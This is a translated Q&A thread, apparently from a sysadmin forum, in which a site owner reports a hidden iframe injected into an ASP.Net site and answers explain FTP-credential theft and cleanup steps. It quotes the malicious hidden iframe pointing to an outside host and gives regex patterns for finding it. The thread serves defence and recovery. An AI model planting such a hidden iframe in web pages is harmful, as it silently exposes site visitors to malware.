我的一个网站最近感染了某种攻击,涉及注入隐藏的 iframe,其来源是网站 q5x.ru(请勿链接)。
A谷歌搜索没有帮助我弄清楚这次攻击是如何发生的,所以我想知道你们中是否有人遇到过同样的问题?
iframe 代码如下:
<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>
根据要求,我正在运行一个带有数据库的 ASP.Net 网站,至于表单,显然是用于回发的 ASP.Net 表单。
答案1
我们最近在我们的一个客户的网站上遇到了同样的问题。
此问题很可能是由病毒感染引起的,该病毒主要针对 FTP 客户端并搜索主机名/用户名/密码组合。一旦找到,就会打开与 FTP 服务器的连接,并搜索 index.* 文件并将 iFrame 添加到其中。
在我们的案例中,我们的客户是少数可以直接访问 FTP 服务器的客户之一。我们立即更改了密码,恢复了文件备份,并取消了客户的 FTP 访问权限。
您应该采取的步骤:
- 更改密码立即地
- 如果你有权访问服务器 FTP 日志,找出哪些文件已被感染
- 对于受感染的文件,我强烈建议手动恢复这些文件并且默认不使用搜索/替换。在大多数情况下,IFrames 会添加到文件末尾,但我也看到过文件被部分删除的情况。
另请注意,如果谷歌爬虫在感染病毒后访问你的网站,它会将你添加到恶意软件列表这将严重影响您的网站声誉。如果发生这种情况,采取以下步骤:
- 确保网站不再包含受感染的文件
- 确保您的网站已通过Google 网站站长工具
- 使用 Google 网站管理员工具请求新的网站审核
答案2
以下一些建议或许能帮到你:
- 为了防止此类攻击,首先要做的是尽快更改您的 ftp、控制面板和数据库密码。
- 将服务器中的文件权限更改为最高安全模式。
- 从服务器下载所有文件并检查是否感染。清除受感染的文件。
- 使用好的防病毒软件,扫描并清理用于登录托管服务器的每台电脑。
- 切勿使用公共计算机访问您的服务器。
如何清除受感染的文件?
使用这些正则表达式搜索所有包含恶意代码的页面并将其替换为空格:
<iframe src=\”http://[^"]*” width=105 height=175 style=\”visibility:hidden;
position:absolute\”></iframe>
echo \”<iframe src=\\\”http://[^"]*\” width=105 height=175 style=\\\”
visibility:hidden; position:absolute\\\”></iframe>\”;
您可能必须编写一个脚本来自动执行服务器中的所有文件。
来源 : http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
https://stackoverflow.com/questions/990437/iframe-script-attack-to-website
答案3
我以前也遇到过这种情况。您需要手动搜索有问题的注入脚本并将其删除。我建议您更改密码,并更改数据库和数据库表的名称,以确保
答案4
虽然@Aron写道可能某些客户端病毒已经获取了您的密码(对于这种特定攻击来说,这很可能是真的),通常这类攻击会利用服务器软件中未修补的漏洞。例如在 Web 服务器本身、CMS 或工具中,例如phpMyAdmin。
那么:您确定您的服务器上运行的是所有软件的最新版本吗?
(或者 FTP 日志确实显示了一些活动?)